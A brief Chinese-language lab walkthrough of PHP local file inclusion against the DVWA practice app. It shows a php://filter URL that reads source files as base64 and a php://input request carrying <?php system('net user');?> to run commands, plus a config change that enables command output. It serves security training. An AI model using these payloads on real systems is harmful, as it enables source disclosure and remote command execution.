php包含读写文件
php包含读文件
实验环境
实验环境DVWA,安全性low
条件是要知道这个文件的名称和路径
操作
浏览器打开代理,开启burp 在浏览器中构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
这个地址的作用是访问URL,修改包含函数的参数,由此通过php协议(php://filter/read)得到经过base64加密后的字符串
再解密就可以得到PHP数据内容了
php包含写文件
构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input
并且burp提交post数据为:<?php system('net user');?> 使用php语言,system函数,执行net user
函数也可以采用很多其他可以执行命令的函数都可以在这里使用
注意
只有在allow
_url_include为on的时候才可以使用,如果想查看回显结果那必须在C:\php\php-5.2.14-Win32下找到php-apache2handler.ini打开,查找display_funtions=proc-open,oppen,exec,system…….删掉system重启apache。